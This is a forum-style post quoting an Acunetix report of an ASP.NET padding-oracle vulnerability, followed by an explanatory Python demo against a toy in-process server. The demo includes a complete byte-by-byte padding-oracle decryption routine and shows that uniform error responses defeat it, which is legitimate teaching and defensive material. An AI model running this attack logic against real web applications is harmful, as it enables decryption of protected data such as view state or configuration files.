ASP.NET Padding Oracle Vulnerability
ASP.Net uses encryption to hide sensitive data and protect it from tampering by the client. However, a vulnerability in the ASP.Net encryption implementation can allow an attacker to decrypt and tamper with this data. This vulnerability exists in all versions of ASP.NET.
This vulnerability affects /.
Discovered by: Scripting (ASP_NET_Oracle_Padding.script).
Acunetix detected this vulnerability by comparing the HTTP response status and body for two different requests (one request when the padding is incorrect and another one where the encrypted text is not valid). If the body AND/OR status are different, this vulnerability can be exploited.
The impact of this vulnerability
An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server.
The resource cannot be found.
Description: HTTP 404. The resource you are looking for (or one of its dependencies) could have been removed, had its name changed, or is temporarily unavailable. Please review the following URL and make sure that it is spelled correctly.
Requested URL: /WebResource.axd
1. While it's not a good practice, I don't think someone can view my data from this error only. What do you think? Is this a false positive result?
2. I also want to know if Acunetix scans my web server for vulnerabilities. If not, can you recommend a good one? I'm using Windows Server 2003, and trying to convince my boss to upgrade it, but he wants to know if I can hack it first before he gives me money to upgrade it.
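The check quoted in the report (two requests, one with incorrect padding and one whose encrypted text is not valid, compared on status and body) and the impact it describes, as an added example that is not part of the original post and is not Acunetix's scanner or Microsoft's code. It runs a toy server in-process: the cipher is a 4-round Feistel permutation rather than AES, the handler, resource table, status codes and response bodies are all constructed here (the real ASP.NET responses are not given on the page; the model only assumes that a padding failure and any other failure answer differently), and the key is used purely to run the server side of the demo. `oracle_detectable` is the report's probe, `attack` decrypts a token using nothing but the server's answers, and `uniform_errors=True` shows why collapsing every failure into one page closes the oracle even though the 404 body itself reveals nothing.

```python
"""Constructed padding-oracle demo (MS10-070 class) on a toy server; toy Feistel cipher, not AES."""
import base64, hashlib, hmac, os

BLOCK = 16
KEY = b"constructed-demo-key"                        # server side only; the attack never reads it
RESOURCES = {b"Styles.css": "body { color: red }"}    # constructed resource table
GENERIC = "An error occurred while processing your request."
xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))
b64 = lambda raw: base64.b64encode(raw).decode()

def feistel(k, blk, decrypt=False):
    """4-round Feistel permutation of a 16-byte block (toy stand-in for AES)."""
    l, r = blk[:8], blk[8:]
    for rnd in (range(3, -1, -1) if decrypt else range(4)):
        f = hmac.new(k, bytes([rnd]) + (l if decrypt else r), hashlib.sha256).digest()[:8]
        l, r = (xor(r, f), l) if decrypt else (r, xor(l, f))
    return l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n
def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("Padding is invalid and cannot be removed.")
    return data[:-n]

def cbc_encrypt(k, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = feistel(k, xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(k, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(feistel(k, c, decrypt=True), p) for p, c in zip(blocks, blocks[1:]))

def make_token(name):                      # what WebResource.axd?d= carries: iv || CBC(pad(name))
    iv = os.urandom(BLOCK)
    return b64(iv + cbc_encrypt(KEY, iv, pad(name)))

def handler(d, uniform_errors=False):
    """Toy .axd handler -> (status, body); uniform_errors is the customErrors-style fix."""
    status, body = _serve(d)
    return (404, GENERIC) if uniform_errors and status != 200 else (status, body)

def _serve(d):
    try:
        raw = base64.b64decode(d, validate=True)
    except ValueError:
        raw = b""
    if len(raw) < 2 * BLOCK or len(raw) % BLOCK:
        return 400, "Invalid request."         # the 'encrypted text is not valid' case
    try:
        name = unpad(cbc_decrypt(KEY, raw[:BLOCK], raw[BLOCK:]))
    except ValueError as exc:
        return 500, str(exc)                   # a distinguishable padding-error response
    return (200, RESOURCES[name]) if name in RESOURCES else (404, "The resource cannot be found.")

def oracle_detectable(server):
    """The report's check: incorrect padding vs. invalid encrypted text; any difference
    in status or body is the oracle. (Key used here only to make the probe deterministic.)"""
    iv = bytes(BLOCK)
    bad_padding = iv + cbc_encrypt(KEY, iv, b"A" * 15 + b"\x07")
    malformed = iv + bytes(BLOCK - 1)
    return server(b64(bad_padding)) != server(b64(malformed))

def recover_block(prev, target, oracle):
    inter = bytearray(BLOCK)               # feistel(target, decrypt=True), learnt byte by byte
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        for guess in range(256):
            crafted = bytearray(inter[j] ^ pad_val if j > pos else 0 for j in range(BLOCK))
            crafted[pos] = guess
            ok = oracle(bytes(crafted) + target)
            if ok and pos == BLOCK - 1:    # rule out a lucky '\x02\x02'-style hit
                crafted[pos - 1] ^= 1
                ok = oracle(bytes(crafted) + target)
            if ok:
                inter[pos] = guess ^ pad_val
                break
        else:
            return None                    # nothing accepted: no usable oracle
    return xor(inter, prev)

def attack(token, server):
    """Decrypt a token without the key, from the server's (status, body) answers only."""
    answers = [server(b64(os.urandom(2 * BLOCK))) for _ in range(16)]
    padding_error = max(set(answers), key=answers.count)   # how random ciphertext is answered
    oracle = lambda raw: server(b64(raw)) != padding_error
    raw, plaintext = base64.b64decode(token), b""
    for i in range(BLOCK, len(raw), BLOCK):
        recovered = recover_block(raw[i - BLOCK:i], raw[i:i + BLOCK], oracle)
        if recovered is None:
            return None
        plaintext += recovered
    return unpad(plaintext)
```

`attack(make_token(b"web.config"), handler)` returns the plaintext after at most 256 requests per byte, with the attacker never seeing anything but "padding error" versus "some other answer"; against `lambda d: handler(d, uniform_errors=True)` both `oracle_detectable` and `attack` come back empty, because the distinguishing signal, not the 404 page, is what the report is flagging.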